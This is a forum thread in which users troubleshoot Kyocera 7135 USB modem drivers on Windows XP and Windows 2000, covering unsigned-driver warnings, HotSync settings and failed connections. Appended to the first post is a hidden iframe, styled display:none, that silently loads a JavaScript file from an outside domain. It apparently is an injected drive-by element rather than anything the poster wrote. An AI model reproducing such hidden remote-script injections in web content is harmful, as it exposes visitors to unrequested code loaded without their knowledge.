+ Reply to Thread

Wireless Modem USB drivers for Windows XP

I am having trouble finding the proper drivers to install that will allow me to use my 7135 as a wireless modem on my Windows XP machine using my USB connection.

I have downloaded the USB drivers from the Kyocera Wireless site, and have attempted to use the kwc_win2k.inf file since it claims to support XP. However when I attempt to add the modem and select it from a list, the process reports back (when I select KYOCERA WIRELESS MODEM) that the "driver is not digitally signed!"

Has anyone had any success using the USB wireless modem on Windows XP????<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

I use it on a Sony VAIO notebook with WIN XP Home. For now I'm using the cradle and it's USB connector to do it. I followed the FAQ on how to set it up.

http://www.smartphonesource.com/vbul...&threadid=6851

I haven't gotten my true-usb cable yet. The main thing to remember once you get it set up is to turn off the hotsync manager and put the phone into FaxModem mode before initiating the data connection from the computer.
    Taylor Made Web Sites and Domain Services
    Happy Kyocera 7135 User 2003-2008. Now Treo 800w.

Those instructions are for Win2k machines not XP.

Also check your "pref pda" and be sure its set up for your service. I also have a Sony Vaio and no problems.

Originally posted by eener
    Those instructions are for Win2k machines not XP.
    Worked for me with XP anyway. Just trying to help.

jeh
    Turning off the hotsync app isn't necessary. This isn't like a serial port.

Originally posted by tmwebsites
    Worked for me with XP anyway. Just trying to help.
    Well, if it worked for you, then I will try it out. Thanks for your help!!

Originally posted by jeh
    Turning off the hotsync app isn't necessary. This isn't like a serial port.
    On mine, if I don't turn off the hotsync app, I can't make a connection.

Modem works fine

I just set mine up again as I switched phones due to a scratch 1st unit. Just click on modem on the CD and XP does the rest. I think it does come up with a "microsoft does not have a sig crap" just ignore it. As with the above comments you don't do anything with hotsync. you just click on data/fax use data only. If you forget to turn it to voice again to receive regular calls the phone will default back to voice once you turn it off and on again. Any problems call Kyo help desk on toll free # as they are very helpful. For some reason once I set it up I could not hotsync anymore. I called them and they suggested a soft reset of 7135 and everything was fine after.

Progress Report for USB Modem on WinXP home

Well, so far I've spent 4 hours attempting to set this USB modem up properly, and to no avail. I had someone more qualified than I make an attempt at it last evening, and still no luck. I've tried everything from turning off the hot sync manager, soft resets on my phone, downloading the drivers from Kyo's site, using the drivers on the CD that came with it.

One strange occurance though, I had my phone on my cradle at work this morning, and all of a sudden, the system found new hardware. Very odd since the phone sits on the cradle every day, but anyway, I let the system (Win2k) attempt to set up the USB modem and pointed to the CD for drivers. I was able to get the set up completed and could make a connection. But a twist to the whole problem - I can send data, but not receive data!!!! All pages will not display. I found out we also have another user here experiencing the same issue (on Win2k). I am getting a bit frustrated with this!!!:anger

Any ideas or suggestions would be greatly appreciated!!!